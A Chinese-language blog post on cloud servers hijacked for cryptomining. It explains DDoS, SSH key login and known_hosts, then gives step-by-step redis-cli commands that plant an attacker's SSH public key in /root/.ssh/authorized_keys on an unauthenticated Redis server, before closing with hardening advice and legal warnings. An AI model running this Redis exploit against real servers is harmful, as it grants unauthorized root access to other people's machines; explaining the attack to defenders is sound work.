上次群里有个小伙伴的阿里云服务器被挖矿了,刚好趁此机会介绍一下简单介绍一下DDOS攻击、SSH免密登录流程原理,和后续小伙伴们在安装Redis以及对外网的服务注意事项。
阅读本文之前,请先熟读一下刑法第二百八十五条:
《刑法》第二百八十五条
【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
1. 什么是DDOS攻击
分布式拒绝服务攻击(Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。
攻击类型:
一种为流量攻击,主要是针对网络带宽的攻击,即大量攻击包导致网络带宽被阻塞,合法网络包被虚假的攻击包淹没而无法到达主机;
一种为资源耗尽攻击,主要是针对服务器主机的攻击,即通过大量攻击包导致主机的内存被耗尽或CPU被内核及应用程序占完而造成无法提供网络服务
常见的表现形式:
(1) 被攻击主机上有大量等待的TCP连接。
(2) 网络中充斥着大量的无用的数据包,源地址为假。
(3) 制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯。
(4) 利用受害主机提供的服务或传输协议上的缺陷,反复高速地发出特定的服务请求,使受害主机无法及时处理所有正常请求。
(5) 严重时会造成系统死机
2. 自己购买的Linux服务器是怎么被挖矿的
背景
近两年很多人购买了云服务器,阿里云、华为云、腾讯云等 出现情况是经常云服务器有不明进程,cpu使用率90%以上 部署云服务器的被清空-支付BTB才可以还原
常见的入侵方式
- 弱口令爆破入侵
- webshell文件提权入侵
- redis端口入侵最多
常见表象
- 不明进程的CPU占有率过高
- 强制停止,过一会又自动出现
解决办法
- 关闭对外监听的端口
- 查找linux定时任务->清除位置任务
- redis禁止远程访问 或者 设置复杂密码、不用默认的6379端口
- 恢复出厂设置
那这个入侵原理是怎样的?
需要知识:对称和非对称加密知识、中间人攻击知识、ssh登录流程知识
3. SSH登录原理
SSH流程解析(使用了RSA非对称加密算法):
(1)远程主机收到用户的登录请求,把自己的公钥发给用户。
(2)用户使用这个公钥,将登录密码加密后,发送回来。
(3)远程主机用自己的私钥,解密登录密码,如果密码正确,就同意用户登录
提示:如果攻击者插在用户与远程主机之间(比如在公共的wifi区域),用伪造的公钥,获取用户的登录密码, 再用这个密码登录远程主机,那么SSH的安全机制就荡然无存了,这种风险就是著名的 "中间人攻击"
第一次登录对方主机,系统会出现下面的提示
“公钥指纹”,是指公钥长度较长(这里采用RSA算法,长达1024位),很难比对,所以对其进行MD5计算,将它变成一个128位的指纹。上例中是98:2e:d7:e0:de:9f:ac:67:28:c2:42:2d:37:16:58:4d用户自己衡量以后决定接受这个远程主机的公钥(远程主机贴出公钥指纹,以便用户自行核对) 接受之后,就可以输入密码,成功后就可以登录, 当远程主机的公钥被接受以后,它就会被保存在文$HOME/.ssh/known_hosts之中。下次再连接这台主机,系统就会认出它的公钥已经保存在本地了,从而跳过警告部分,直接提示输入密码
4. SSH免密登录远程Linux云主机流程解析
使用密码登录,每次都必须输入密码,非常麻烦, SSH还提供了公钥登录,可以省去输入密码的步骤
流程说明
- 所谓“公钥登录”,原理就是用户将自己的公钥储存在远程主机上。
- 登录的时候,远程主机会向用户发送一段随机字符串,用户用自己的私钥加密后,再发回来。
- 远程主机用事先储存的公钥进行解密,如果成功,就证明用户是可信的,直接允许登录shell,不再要求密码
- 要求用户必须提供自己的公钥。如果没有现成的,可以通过
ssh-keygen命令生成一个
最多的应⽤案例:Git 代码仓库管理通信
5. SSH免密登录远程Linux云主机实战
什么是known_hosts文件?
A通过ssh首次连接到B,B会将公钥1(host key)传递给A,A将公钥1存入known_hosts文件中,即SSH会把你每个你访问过计算机的公钥(public key)都记录在~/.ssh/known_hosts,当下次访问相同计算机时,OpenSSH会核对公钥。如果公钥不同,OpenSSH会发出警告,避免受到DNS Hijack之类的攻击。
host文件内容格式:ip 公钥串
当修改这个公钥串后,A通过ssh登陆B时提示 :Host key verification failed
原因:A的known_hosts文件中记录的B的公钥1 与 连接时B传过来的公钥2不匹配
解决办法:
(1):删除A的known_hosts文件中记录的B的公钥
(2):清空本地host主机配置 echo "" > ~/.ssh/known_hosts
(3):修改配置文件,在ssh登陆时不通过known_hosts文件进行验证(安全性有所降低)需重启机器
6. SSH免密登录远程Linux云主机实战
本地生成秘钥串:
- 通过
ssh-keygen命令生成私钥 - 运行结束以后,在
$HOME/.ssh/目录下,会新生成两个文件id_rsa.pub和id_rsa, 前者是你的公钥,后者是你的私钥,将公钥传送到远程主机host上面,再登录,就不需要输入密码了
远端服务器:
- 远程主机将用户的公钥,保存在登录后的用户主目录的
$HOME/.ssh/authorized_keys文件中 - 公钥就是一段字符串,只要把它追加在
authorized_keys文件的末尾就行了
这些就是入侵的原理。核心:就是把公钥保存到 $HOME/.ssh/authorized_keys目录
7. 阿里云Redis6 入侵实战
两台服务器安装Redis6,然后开启允许远程连接 bind 0.0.0.0,不设置密码,或者简单默认123456,守护进程运行 daemonize yes
指定配置文件启动 ./redis-server ../redis.conf
- 使用ssh-keygen生成一对秘钥
- 公钥生成攻击键值, 生成后查看生成的文件
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > test.txt
- 配置Key到Redis中
./src/redis-cli -h 192.168.xxx.xxx # 连接远端要ru侵的Redis cat test.txt | redis-cli -h 192.168.xxx.xxx -x set bar # 查看公钥内容,将内容通过管道命令写到bar这个key中
- 登录Redis进行检查,是否已经写入进Redis中
redis-cli -h 192.168.xxx.xxx get bar
- 通过Redis保存机制替换系统文件
./src/redis.cli -h 192.168.xxx.xxx config set dir /root/.ssh config get dir config set dbfilename "authorized_keys" save exit
- 成功的将自己的公钥写入 /root/.ssh 文件夹的 authotrized_keys
- 登录远程主机看下效果
ssh -i id_rsa root@192.168.xxx.xxx - 已经可以免密正常登陆192.168.xxx.xxx 服务器了
入侵流程,利用redis的持久化操作文件权限
- Redis Config Set 命令可以动态地调整 Redis 服务器的配置(configuration)而无须重启。
- Redis Save 命令执行一个同步保存操作,将当前 Redis 实例的所有数据快照(snapshot)以 RDB 文件的形式保存到硬盘。
- Redis支持RDB和AOF两种持久化机制
- RDB持久化是把当前进程数据生成快照保存到硬盘的过程,触发RDB持久化过程分为手动触发和自动触发
- Redis持久化配置,RDB文件保存在dir配置指定的目录下,文件名通过dbfilename配置指定
- 通过执行
config set dir {newDir}和config set dbfilename {newFileName}运行期动态执行- 当下次运行时RDB文件会保存到新目录
不过,我们还得再复习一下刑法第二百八十五条
【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。
8. 如何避免云服务器被ru侵提权
- 禁止一些高危命令
- 以低权限运行应用服务
- 为服务 添加复杂密码验证
- 禁止外网访问,配置防火墙
- 保证 authorized_keys 文件的安全(只读,防添加新公钥等)
